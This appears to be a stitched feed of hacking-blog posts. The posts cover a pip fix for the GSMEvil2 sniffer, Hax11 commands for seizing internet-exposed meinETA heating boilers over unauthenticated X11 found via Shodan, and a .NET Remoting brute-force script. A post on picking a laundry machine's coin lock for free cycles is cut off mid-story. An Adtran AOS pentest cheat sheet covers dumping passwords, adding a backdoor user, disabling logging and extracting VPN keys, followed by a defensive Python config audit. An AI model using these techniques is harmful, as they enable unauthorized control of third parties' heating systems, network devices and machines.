So MOST of the instructions on GSMEvil2's GitHub work fine, with the exception of the pip guidance. Here is what I had to use to get it working:
pip3 install pyshark flask flask_socketio==4.3.2 pysqlite3
Yeah, it's a short post. Deal with it :P
"Let's break it!"
All info in this blog is for educational use only!
meinETA is a heating control system that can be accessed remotely via a password-protected portal. However, since it uses X11 to expose the GUI to the user, if you can get the IP of the meinETA system the portal can be bypassed and you can manipulate the system directly with Hax11, as seen below.
The ETA site says this about meinETA:
meinETA: the free internet platform
If your heating boiler is connected to the internet, you can see and change all heating settings on your mobile, tablet or PC. So you always have a handle on your heating, wherever you are! When you login to www.meinETA.at, you see the touchscreen as if you were standing right in front of the boiler!
This means that with Hax11 you have full control of the system without needing the portal, just the system's IP. This would seem to be a big hurdle, but a few minutes on Shodan and you can track systems down and be in full control with just a few keystrokes and mouse clicks. There doesn't seem to be any sort of authentication on the GUI, not even a PIN code, so there is nothing stopping you once you locate one.
More on ETA
Get Hax11 HERE
I have updated Hax11 to connect to non-default display ports. The previous version only allowed connecting to display 0 (port 6000), but now you can connect to any display a system has available.
Example:
If you want to connect to display 1 (port 6001), use this command:
python hax11.py ip.addr.here 1
If you want to connect to display 0, use the old command style:
python hax11.py ip.addr.here
You can connect to display 1, 2, 3, and so on. I know it seems like a small change, but it doubles (or more) the attack surface. So while the change is small, the impact is big.
Get it HERE
Enjoy!
I wanted to hack up something to make it less painful, so I searched the web for common object names, then searched GitHub for MS .NET Remoting apps and added the names they were using as well. Then I coded up a little bash script that uses the ExploitRemotingService tool and loops through the list I compiled. Testing so far shows it works like a charm, with a few bugs.
Still, I thought it could be a nice tool to have in your bag of holding, so I made it available on GitHub. I hope someone gets some use out of it.
Usage: ./bfNET ip.addr port
Get it here
A friend of mine was telling me about how her landlord keeps raising the price on the washer and dryer in her apartment complex. She knew I liked playing with tech and machines, so she asked if we could figure out how to get the coins out. I explained that would be a bad idea, as it would be clear something was up if the machines never had money in them on collection day, but maybe we could figure out a way to get free use of them, which would be harder to detect. A door with a lock on top of the housing for the coin mechanism had a tubular lock, as seen below:
So I busted out my picks and got the door to open. Here is what I found when I bypassed the lock:
As you can see it's just a few wires; I figured this was our access point to free cycles. You can see the white bracket that connects the coin functions to the machine, as seen below:
Below are some Adtran AOS notes you might find useful in a pentest.
CLI commands:
Turns on privileged commands (all commands below assume "enable" was executed successfully):
enable
Disable logging for the session:
no events all
From here, for easy hacking, if the system is in a DMZ, hanging off the internet, or the proper ports are exposed, just enable the HTTP server and continue from there:
configure terminal
http server 80
If you can't access the HTTP server, the commands below should help get some info out of the system.
List users and passwords:
show running-config | include username #displays usernames and passwords.
Add a new user with operator privileges:
configure terminal
username operator privilege 10 password unencrypted passwd1
List IP interfaces:
show ip interfaces
Download a file to the target system (after running the command below you will be prompted for more data, and you will need a TFTP server running that is reachable from the target):
copy tftp flash (or cflash)
Download a file from the target to your system:
copy flash tftp
View VPN names and pre-shared keys:
show crypto ike remote-id
View VPN configs (the command below should list all client configs; add the pool name at the end to view only that config):
show crypto ike configuration pool
View VPN policy:
show crypto ike policy
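As an added example (not from the original post, and not Adtran's own tooling), a small Python audit that scans a saved AOS running-config for the weak settings walked through above: user accounts stored with cleartext passwords, the cleartext HTTP management server, and disabled event logging. The config excerpt is constructed for the demo, and the remediation wording is generic rather than Adtran's.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample of an AOS running-config excerpt (not captured from a real device).
SAMPLE_CONFIG = """\
hostname ROUTER-A
username operator privilege 10 password unencrypted passwd1
username admin password encrypted 9f8e7d6c5b4a
no events all
http server 80
!
"""

@dataclass
class Finding:
    line_no: int
    severity: str
    message: str

# Each rule: (compiled regex, severity, message). Regex groups are fed into the message.
RULES = [
    (re.compile(r"^username\s+(\S+).*\bpassword\s+unencrypted\b"), "high",
     "user '{0}' is stored with a cleartext password; anyone who can read the config has it"),
    (re.compile(r"^http\s+server\b"), "medium",
     "cleartext HTTP management server enabled; disable it unless required and restrict access"),
    (re.compile(r"^no\s+events\s+all\b"), "medium",
     "event logging disabled; re-enable it so CLI and VPN changes are recorded"),
]

def audit_aos_config(text: str) -> List[Finding]:
    """Return one Finding per config line that matches a weak-setting rule."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        for pattern, sev, msg in RULES:
            m = pattern.match(line)
            if m:
                findings.append(Finding(n, sev, msg.format(*m.groups())))
    return findings

if __name__ == "__main__":
    for f in audit_aos_config(SAMPLE_CONFIG):
        print(f"line {f.line_no} [{f.severity}] {f.message}")
```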
TCL script to set up a VPN in the AOS CLI, with walkthrough:
https://supportcommunity.adtran.com/jmaxz83287/attachments/jmaxz83287/nv-aos/182/1/Configuring%20Main%20Mode%20and%20Remote%20Client%20VPN%20in%20the%20AOS%20CLI.pdf
AOS CLI reference:
https://supportcommunity.adtran.com/jmaxz83287/attachments/jmaxz83287/nv-aos/428/7/AOS%20R13.12.0%20Command%20Reference%20Guide.pdf
If you have anything to add, please hit me up and let me know; I would love to see this grow!
Labels: adtran, aos, cheatsheet, pentest